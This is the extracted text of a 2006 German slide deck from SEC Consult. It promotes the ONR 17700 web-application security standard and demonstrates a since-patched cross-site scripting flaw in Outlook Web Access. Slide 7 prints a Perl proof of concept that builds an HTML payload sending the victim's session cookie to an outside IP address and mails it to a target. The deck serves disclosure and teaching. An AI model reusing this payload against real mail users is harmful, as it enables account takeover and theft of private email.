Sichere Webapplikationen nach ONR 17700 oder Wer liest meine Emails? Advisor for your information security. Essen, 10.-13. Oktober 2006 Version 1.0
SEC Consult Advisor for your information security Information Security Beratung Unabhängigkeit von Produktherstellern Spezialist für technische Audits + Umsetzung Spezialist für die Einführung von Sicherheitsprozessen und Policies Behörden, Banken, Versicherungen, börsennotierte Unternehmen in Zentraleuropa als Kunden 2 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
ONR 17700 Sicherheitstechnische Anforderungen an Webapplikationen Erste Norm im EU-Raum für die Sicherheit von Webanwendungen Entwickelt von Österr. Normungsinsitut, SEC Consult, Großbanken, - versicherungen, Behörden, Wirtschaftsprüfern 2004/05 Vollständige Abdeckung des Sicherheitsbereichs in Webapplikationen (die von anderen Normen z.b. ISO 27001 nur gestreift werden) Gewährleistung eines hohen Sicherheitsniveaus für kritische Webapplikationen Sehr gutes Verhältnis von Investment zu Verbesserung des Sicherheitslevels 3 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
Webapplikationen das schwächste Glied? Infrastruktur (DMZ, Firewalls, ) ist meist OK Viele Webapplikationen (Portale, Shops, Webmail, ) sind unsicher, weil Oft proprietäre Entwicklungen Müssen schwer vorhersehbaren Benutzerinput verarbeiten Stehen ungeschützt im Internet 4 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
Schwachstellen in Webanwendungen nur bei Eigenentwicklungen? Auch Webanwendungen von großen Herstellern wie z.b. der webbasierte Email Client Outlook Web Access (OWA) von Microsoft können verwundbar sein Was ist OWA? Email Client im Web Microsoft Outlook Funktionalität Mehrere Millionen Benutzer weltweit 5 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
Schwachstelle in Microsoft Outlook Web Access (OWA) Entdeckt im SEC Consult Vulnerability Lab Ermöglicht Cross Site Scripting Angriffe auf Nutzer von OWA Übernahme von Mail-Konto möglich Somit Vollzugriff auf alle Mails des kompromittierten Nutzers Microsoft Patch bereits ausgerollt: MS06-029 6 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
Hacking Outlook Web Access (Schritt 1 von 4) Der Angreifer verfasst ein Email, mit dessen Hilfe er die Session seines Opfers übernehmen will, und versendet es als Inline Attachment. #!/usr/bin/perl print "Cross Site Scripting demonstration\n"; print "<img src='http\x00http:///nonexisting_image.gif' onerror='javascript:window.location=http://80.75.240.135/sendcookie.php?cookie='+document.c ookie' alt='<s'\x00\n"; #!/usr/bin/perl use strict; #>./create_attack_mail.pl use Mail::Sender; > exploit.html my $recipients = opfer@example.org'; my $sender = new Mail::Sender {smtp => 'smtp.sec-consult.com'}; if ($sender->openmultipart({from => 't.kerbl@sec-consult.com', to => $recipients, subject => 'Inline HTML file', subtype => 'related', boundary => 'SECSECSECSECSECSECSEC', type => 'multipart/related'}) > 0) { $sender->sendfile( {description => 'html body', ctype => 'text/html; charset=iso-8859-1', disposition => 'NONE', file => 'exploit.html' }); }; Veröffentlichung der Schwachstelle erfolgte in Abstimmung mit Microsoft Development in Redmond, USA 7 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
Hacking Outlook Web Access (Schritt 2 von 4) Das Opfer öffnet das präparierte Email mit Outlook Web Access 8 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
Hacking Outlook Web Access (Schritt 3 von 4) Das Cookie wird im Hintergrund an den Angreifer gesendet, ohne dass das Opfer etwas davon bemerkt 9 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
Hacking Outlook Web Access (Schritt 4 von 4) Nach Übernahme des Cookies kann der Angreifer die Session seines Opfers übernehmen und somit dessen Account vollständig kompromittieren 10 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
SEC Consult Advisory für Outlook Web Access 11 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
ONR 17700 So schützt man sich richtig z.b. vor Cross Site Scripting in Webapplikationen Die ONR 17700 definiert Vorgaben, die z.b. Cross Site Scripting Angriffen entgegenwirken: Kapitel 3: Architektur der Webapplikation Kapitel 5.4: Sitzungsmanagement Kapitel 6: Formulare und Benutzereingaben Werden alle diese Vorgaben der ON- Regel erfüllt, kann Cross Site Scripting unterbunden werden Infos: /17700 12 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
SEC Consult Advisor for your information security Information Security Beratung Unabhängigkeit von Produktherstellern Spezialist für technische Audits + Umsetzung Spezialist für die Einführung von Sicherheitsprozessen und Policies Behörden, Banken, Versicherungen, börsennotierte Unternehmen in Zentraleuropa als Kunden 13 2006 SEC Consult Unternehmensberatung GmbH All rights reserved
Wie erreichen Sie SEC Consult? SEC Consult Unternehmensberatung GmbH Blindengasse 3, A-1080 Wien Tel: +43 / 1 8903043 0 Fax: +43 / 1 8903043 15 Email: office@sec-consult.com http:// Weitere Informationen finden Sie auch auf unserem Messestand: Halle: GA Stand-Nr.: 117 14 2006 SEC Consult Unternehmensberatung GmbH All rights reserved